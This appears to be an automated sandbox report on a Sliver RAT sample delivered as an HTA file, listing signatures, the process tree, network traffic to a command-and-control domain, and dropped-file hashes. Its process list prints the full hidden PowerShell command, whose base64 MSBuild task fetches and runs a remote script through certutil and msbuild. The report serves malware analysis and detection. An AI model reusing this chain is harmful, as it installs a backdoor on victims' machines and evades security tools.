C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Sliver RAT v2

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sliver family

sliver

SliverRAT

trojan backdoor sliver

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Manipulates Digital Signatures

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION" C:\Windows\SysWOW64\certutil.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7\Name = "szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL" C:\Windows\SysWOW64\certutil.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_CA_REVOCATION" C:\Windows\SysWOW64\certutil.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Deobfuscate/Decode Files or Information

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\certutil.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\certutil.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1908 wrote to memory of 3520 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1908 wrote to memory of 3520 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1908 wrote to memory of 3520 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3520 wrote to memory of 1424 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\certutil.exe
PID 3520 wrote to memory of 1424 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\certutil.exe
PID 3520 wrote to memory of 1424 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\certutil.exe
PID 3520 wrote to memory of 952 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe
PID 3520 wrote to memory of 952 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe
PID 952 wrote to memory of 3036 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 952 wrote to memory of 3036 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3036 wrote to memory of 4876 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3036 wrote to memory of 4876 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 952 wrote to memory of 2056 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 952 wrote to memory of 2056 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2056 wrote to memory of 3988 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2056 wrote to memory of 3988 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 952 wrote to memory of 2136 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 952 wrote to memory of 2136 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2136 wrote to memory of 1616 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2136 wrote to memory of 1616 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden echo PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPg0KICA8IS0tIFRoaXMgaW5saW5lIHRhc2sgZXhlY3V0ZXMgYyMgY29kZS4gLS0+DQogIDwhLS0gQzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29yazY0XHY0LjAuMzAzMTlcbXNidWlsZC5leGUgcHNoZWxsLnhtbCAtLT4NCiAgIDwhLS0gQXV0aG9yOiBDYXNleSBTbWl0aCwgVHdpdHRlcjogQHN1YlRlZSAtLT4NCiAgPCEtLSBMaWNlbnNlOiBCU0QgMy1DbGF1c2UgLS0+DQogIDxUYXJnZXQgTmFtZT0iSGVsbG8iPg0KICAgPEZyYWdtZW50RXhhbXBsZSAvPg0KICAgPENsYXNzRXhhbXBsZSAvPg0KICA8L1RhcmdldD4NCiAgPFVzaW5nVGFzaw0KICAgIFRhc2tOYW1lPSJGcmFnbWVudEV4YW1wbGUiDQogICAgVGFza0ZhY3Rvcnk9IkNvZGVUYXNrRmFjdG9yeSINCiAgICBBc3NlbWJseUZpbGU9IkM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5ldFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxNaWNyb3NvZnQuQnVpbGQuVGFza3MudjQuMC5kbGwiID4NCiAgICA8UGFyYW1ldGVyR3JvdXAvPg0KICAgIDxUYXNrPg0KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtIiAvPg0KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtLklPIiAvPg0KICAgICAgPENvZGUgVHlwZT0iRnJhZ21lbnQiIExhbmd1YWdlPSJjcyI+DQogICAgICAgIDwhW0NEQVRBWw0KICAgICAgICAgICAgICAgIENvbnNvbGUuV3JpdGVMaW5lKCJIZWxsbyBGcm9tIEZyYWdtZW50Iik7DQogICAgICAgIF1dPg0KICAgICAgPC9Db2RlPg0KICAgIDwvVGFzaz4NCiAgICA8L1VzaW5nVGFzaz4NCiAgICA8VXNpbmdUYXNrDQogICAgVGFza05hbWU9IkNsYXNzRXhhbXBsZSINCiAgICBUYXNrRmFjdG9yeT0iQ29kZVRhc2tGYWN0b3J5Ig0KICAgIEFzc2VtYmx5RmlsZT0iQzpcV2luZG93c1xNaWNyb3NvZnQuTmV0XEZyYW1ld29ya1x2NC4wLjMwMzE5XE1pY3Jvc29mdC5CdWlsZC5UYXNrcy52NC4wLmRsbCIgPg0KICAgIDxUYXNrPg0KICAgICAgPFJlZmVyZW5jZSBJbmNsdWRlPSJTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uIiAvPg0KICAgICAgPENvZGUgVHlwZT0iQ2xhc3MiIExhbmd1YWdlPSJjcyI+DQogICAgICAgIDwhW0NEQVRBWw0KICAgICAgICANCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbTsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5JTzsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5SZWZsZWN0aW9uOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOw0KICAgICAgICAgICAgLy9BZGQgRm9yIFBvd2VyU2hlbGwgSW52b2NhdGlvbg0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLkNvbGxlY3Rpb25zLk9iamVjdE1vZGVsOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbjsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUnVuc3BhY2VzOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlRleHQ7DQogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuRnJhbWV3b3JrOw0KICAgICAgICAgICAgdXNpbmcgTWljcm9zb2Z0LkJ1aWxkLlV0aWxpdGllczsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIHB1YmxpYyBjbGFzcyBDbGFzc0V4YW1wbGUgOiAgVGFzaywgSVRhc2sNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICBwdWJsaWMgb3ZlcnJpZGUgYm9vbCBFeGVjdXRlKCkNCiAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgIFN0cmluZyBjbWQgPSBAIihOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vc2VjdXJlLmNsb3VkdGVjaG5vbG9naWVzdXNhLmNvbTo4MDgxL3VwZGF0ZS50eHQnKSB8IGlleCI7DQogICAgICAgICAgICBSdW5zcGFjZSBycyA9IFJ1bnNwYWNlRmFjdG9yeS5DcmVhdGVSdW5zcGFjZSgpOw0KICAgICAgICAgICAgcnMuT3BlbigpOw0KICAgICAgICAgICAgUG93ZXJTaGVsbCBwcyA9IFBvd2VyU2hlbGwuQ3JlYXRlKCk7DQogICAgICAgICAgICBwcy5SdW5zcGFjZSA9IHJzOw0KICAgICAgICAgICAgcHMuQWRkU2NyaXB0KGNtZCk7DQogICAgICAgICAgICBwcy5JbnZva2UoKTsNCiAgICAgICAgICAgIHJzLkNsb3NlKCk7DQogICAgICAgICAgICByZXR1cm4gdHJ1ZTsNCiAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgDQogICAgICAgICAgICANCiANCiAgICAgICAgICAgIA0KICAgICAgICBdXT4NCiAgICAgIDwvQ29kZT4NCiAgICA8L1Rhc2s+DQogIDwvVXNpbmdUYXNrPg0KPC9Qcm9qZWN0Pg== > c:\windows\temp\enc3.txt;certutil -decode c:\windows\temp\enc3.txt c:\windows\temp\d.xml;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\windows\temp\d.xml

C:\Windows\SysWOW64\certutil.exe

"C:\Windows\system32\certutil.exe" -decode c:\windows\temp\enc3.txt c:\windows\temp\d.xml

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe" C:\windows\temp\d.xml

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jf22zewm\jf22zewm.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA103.tmp" "c:\Users\Admin\AppData\Local\Temp\jf22zewm\CSCF2DD54211A2D49E8848FE2A759778517.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xfko3qp1\xfko3qp1.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA1DD.tmp" "c:\Users\Admin\AppData\Local\Temp\xfko3qp1\CSC38CB23A5B53845F9B981C2248DFA324.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\o0ad3aie\o0ad3aie.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA4CB.tmp" "c:\Users\Admin\AppData\Local\Temp\o0ad3aie\CSCC4B6DA4213974CFAB99435AA1B94512.TMP"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 secure.cloudtechnologiesusa.com udp
US 23.239.28.166:8081 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:8080 secure.cloudtechnologiesusa.com tcp
US 8.8.8.8:53 166.28.239.23.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 8.8.8.8:53 6.173.189.20.in-addr.arpa udp

Files

memory/3520-2-0x000000007424E000-0x000000007424F000-memory.dmp

memory/3520-3-0x0000000003270000-0x00000000032A6000-memory.dmp

memory/3520-4-0x0000000074240000-0x00000000749F0000-memory.dmp

memory/3520-5-0x0000000005910000-0x0000000005F38000-memory.dmp

memory/3520-6-0x0000000074240000-0x00000000749F0000-memory.dmp

memory/3520-7-0x0000000005860000-0x0000000005882000-memory.dmp

memory/3520-8-0x0000000006030000-0x0000000006096000-memory.dmp

memory/3520-9-0x0000000006110000-0x0000000006176000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_damg5dxo.rm5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3520-19-0x0000000006180000-0x00000000064D4000-memory.dmp

memory/3520-20-0x0000000006730000-0x000000000674E000-memory.dmp

memory/3520-21-0x00000000067B0000-0x00000000067FC000-memory.dmp

memory/3520-22-0x0000000007E00000-0x000000000847A000-memory.dmp

memory/3520-23-0x00000000077B0000-0x00000000077CA000-memory.dmp

\??\c:\windows\temp\enc3.txt

MD5 940ed0fa0b1fc8ed6fbf279ab67af56f
SHA1 da4b7c40029542659f025ae74fa0be0fb0fa473c
SHA256 731673720695df22b838e0d256f7506eaa4c7570601db0a409302ab3a0cd1686
SHA512 934e3c5ee3b225ab0d686310a435865880b6c59f4885bb93cca814e8354456de3231364d3aa5cb6bc3c4472e6e6539da719c2b214e998e9e5773cca02f7d14ae

memory/952-27-0x000002818DBE0000-0x000002818DC1E000-memory.dmp

memory/952-28-0x000002818DFE0000-0x000002818DFFA000-memory.dmp

memory/952-29-0x00000281A8170000-0x00000281A82CA000-memory.dmp

memory/952-30-0x00000281A8040000-0x00000281A8070000-memory.dmp

C:\windows\temp\d.xml

MD5 6c2a8d820d8d80182aacdc125399cd71
SHA1 51ccd1e0c3247bf24da813a1f660a367f8deefc8
SHA256 104291eb54874a1e80375b91ec552efac6632272654c8a5613730bd2eba9e78a
SHA512 c7c825a9b237850f6d087a449baaeed4e671db91b3db078586e322e992cb26efdb24d0ff8b365291ff58c3786dc563a62c4cbdcb81cecd95027606ef6fffd8c3

memory/952-32-0x00000281A8450000-0x00000281A8572000-memory.dmp

memory/952-33-0x00000281A8370000-0x00000281A83B4000-memory.dmp

memory/952-34-0x00000281A86B0000-0x00000281A882C000-memory.dmp

memory/952-35-0x00000281A8A20000-0x00000281A8D86000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\jf22zewm\jf22zewm.cmdline

MD5 b79b214e3b34c9588406593165569bff
SHA1 4116df0d654742517d69a8132f801e4688ebb26d
SHA256 9a1432b68f86e146f144f06206b3c9e06a677d7b52df4aaa310aff52cb76d03f
SHA512 11d7766e224ee9e942a06a65023e1976de7604d4724f1236d14b69281778e20afab567207eebb0f45f3bde8c53661baba2a439292b456e5a220db7f973df1ce5

\??\c:\Users\Admin\AppData\Local\Temp\jf22zewm\jf22zewm.0.cs

MD5 4a4ff4a5e71cabe4864c862a697c1e27
SHA1 b95fb7438213c3ae9caf0e8b52bb301fefcddb56
SHA256 70e3eb02311312b3f1ff90617cb47ebb9b8e7cab47771668811a34584182c6bb
SHA512 7c9257e5f23e2c378f47cb3bdced440d07bf96575a10883e59e0a0b4d8834b0ab3a43e4b850f48e2538021d2b352d732fc93f81277bcc20c45b070dc56bdcff5

\??\c:\Users\Admin\AppData\Local\Temp\jf22zewm\CSCF2DD54211A2D49E8848FE2A759778517.TMP

MD5 4799bda01f5880c4a0dee36f67c0be86
SHA1 fe89492a52a776ebaeac29c163023a50058675b6
SHA256 3a1297f629a098ea3771944607932a60502995298531fb312c30a4e8ec9b4cd9
SHA512 4cdc430768375c3b870f3ace8ad3b9c32e53eebe5380213f55e897b679abacd547daee75e0674b5b010defc052577720161ee37fe9031a106a835d35113fe4b9

C:\Users\Admin\AppData\Local\Temp\RESA103.tmp

MD5 4fb06109536fb966fc7fe48a4e4c73c5
SHA1 cb634c5aa3ac6d2b3c6dd35921e4c0e312db3012
SHA256 018a3672621a1507f13dd3b1c0b17ee3c580cd6b4f419d16d307f2023b431e9e
SHA512 dedc4370055f51785c20f07495500f3d4f998f71884c1379a619ab1427f73abca7603b74dc234fbdc273420f177583537060dfd364c1916170f8cc3930a0fab0

C:\Users\Admin\AppData\Local\Temp\jf22zewm\jf22zewm.dll

MD5 de3baa1652d6817ba41024c8996de901
SHA1 923c8476f795cb27dbfd8cb627fc7b3975a40212
SHA256 f251611b3d76e57616e1f80c7ec49920bbff294bef9006cbde133868d6c64040
SHA512 a03a0a1aa86b6d4162b253664fbe2f185bca424e145ff3fd1963d06c5851bb9448004464f55c4ce55d1163fbe137efc0d1b1b4c19ac84f91be89c2fc09ab67bd

C:\Users\Admin\AppData\Local\Temp\jf22zewm\jf22zewm.pdb

MD5 57a23f93864adaf79e7eefed41a39ff0
SHA1 5a2250258e1e2f8dbe66ecbfc1b7b753f6bc235b
SHA256 e4b55cfa35a1c121f674ce3b8518f2aead81e7591a137ff288b4f74be7222f0d
SHA512 af5b9867a06367baccbb4fa69825354835d6934b2f929f006444ddb67c06b4e9d84b1aae1dabf83069b9b82502d2c680b4fb87a785c4e0791a723e4e9e0b0e37

memory/952-50-0x00000281A8010000-0x00000281A8018000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\xfko3qp1\xfko3qp1.cmdline

MD5 93f61be44f885540c24a3ba21fc93054
SHA1 aaf9089f5c09ca69e142fceb092eaa231432ad5e
SHA256 ba1cdc0c60624fea02bc85a952474a69c93a4c408a92fbbd6f46ca076885f681
SHA512 d1685bbecf2e060f3a74db65683d233a71c7851527a766207cf4250425b2a47733b760380e1ad15fcdc05cb0a2be9334cbaceb094bcb9d986d755c49bacb01e4

\??\c:\Users\Admin\AppData\Local\Temp\xfko3qp1\xfko3qp1.0.cs

MD5 da1f4b7b1a87cc475dfa05923b6301a0
SHA1 0e2ff764c519bc8169b66437857f01e25676e343
SHA256 624fe16b05ade5d9929c6ecf16857939230ea32156405c18b4dacfb0448e310e
SHA512 d09603fd0e641122cc99ccf6c53bb93db7df2b52ed1cdd44d3e73d963a3e9fd12eb1918477c043ba39e2ae123071f2df98b9180eb2a533c01bbdbaab2563b53b

\??\c:\Users\Admin\AppData\Local\Temp\xfko3qp1\CSC38CB23A5B53845F9B981C2248DFA324.TMP

MD5 d747f845e0479d73806181e4ffd65502
SHA1 4ea4786d121256d1554fde6b540567a02be26ad8
SHA256 9e38db25e91b461a7191f87c4e1b41ce5266da42f82436669495e0c5e86b40f9
SHA512 57d62fe4501202f31b0ec94d11a40306f40a7ec0c708452d09055c51e6161048a49a63ce080443024a0bfcd7f98d24f7134688a21b1b97b4e4bb2e27c1709a51

C:\Users\Admin\AppData\Local\Temp\RESA1DD.tmp

MD5 dd7867673e51ebb41d610f11e45354b7
SHA1 7f800b2b6ea4bc69174d9536db0fe2a3bdaf2906
SHA256 a0dadca789337649ca394bfd993d0e8a49e2c19b4c50d3ffbbb4b7c1a2471a87
SHA512 1da21919dd82c800e6becdec76c15d2d2420312c4656ae2518c6e395563e109dd9079ba49f4344393d87042642c31276e1e8a854663982061baabb470fdd3a9c

C:\Users\Admin\AppData\Local\Temp\xfko3qp1\xfko3qp1.pdb

MD5 e82c8d8eb2bfb54e55ece546f457ba30
SHA1 de6962a4c0384a557a45c22acfa341d1cdd05a36
SHA256 cdf9dadd3895b7f874fef2d898b07e5f505a534fdd9084303a9226f0f77b9898
SHA512 5f0efbc794be8b0301363c3b2c30d15aec056d5801ffedfa612a1699d5b2abe0631d86b0a1ce7dd3748bbc9576d1ef7cd919264f1a0de29146f59a7c3f2bbe32

C:\Users\Admin\AppData\Local\Temp\xfko3qp1\xfko3qp1.dll

MD5 21fc6aeefeb46ee3fac086ae5ce211a0
SHA1 446d2594ab654a6a7e65b689526467fffe9b8834
SHA256 913e46a90ccc162b187f5104d589dc54c0998a023e12d83b8f2a747e4c456802
SHA512 af678b2b0d975396e488d9a27d4f245c85bafbd1a4653e7203fe00f4fdff0548e9363f863b1c4d1346c62365f6fabe206f8f4f7505dc385b80ec30cf20fe122c

memory/952-66-0x00000281A8020000-0x00000281A8028000-memory.dmp

memory/952-77-0x00000281AA820000-0x00000281AA842000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\o0ad3aie\o0ad3aie.cmdline

MD5 04c6f1e77ed254f3f584bb7d8b606404
SHA1 b4fa38bbd3dd3b217809864c0828f31355088655
SHA256 8c875cf738bf775fa8e3d1fe21e624d6e856a47bd060b564a73750d4783440db
SHA512 becdded8061fa3893c06fc10a5b02c72beca945dd1b8cdb30c48c82c9bef5a1600f78f33b78ef6e7a0e70647126c13097ab211f9b55000ee287cfa92cb2b6c89

\??\c:\Users\Admin\AppData\Local\Temp\o0ad3aie\o0ad3aie.0.cs

MD5 9dc0e32c32d7b3cfd2f819d8c0e4c7a5
SHA1 267cb8f96e02e298033786efd8ee6d87a73418a3
SHA256 67bc3e11493360528ba1296980ab818bf4c3938d14ddd6b5063bba03667b28ac
SHA512 c41e6c862933bed65c892b6cc89765a63ae936bdcb7a0499e0b1bd57d2a1d710dd66acb58fa7a7ffbef8a339fe647ccae85f6fdac3e7e7657472576a979a14b0

\??\c:\Users\Admin\AppData\Local\Temp\o0ad3aie\CSCC4B6DA4213974CFAB99435AA1B94512.TMP

MD5 c539223eff9f6a5ebbd73f7d4a1dab74
SHA1 a4c1f35cc92829c1c84ce2c22f17a75490353040
SHA256 a3cc88b9d10aa7290a009cfc3a0d70d87a12b129d78432447cbb4a663244932f
SHA512 955bc58410de5762fa2419c4c574648417b4e2e5c0e0aa51ece48501d0f47768f8e45e77a5f62ed32c1619a5c340165c7bff4726c20df8ebe822853c66c0e936

C:\Users\Admin\AppData\Local\Temp\RESA4CB.tmp

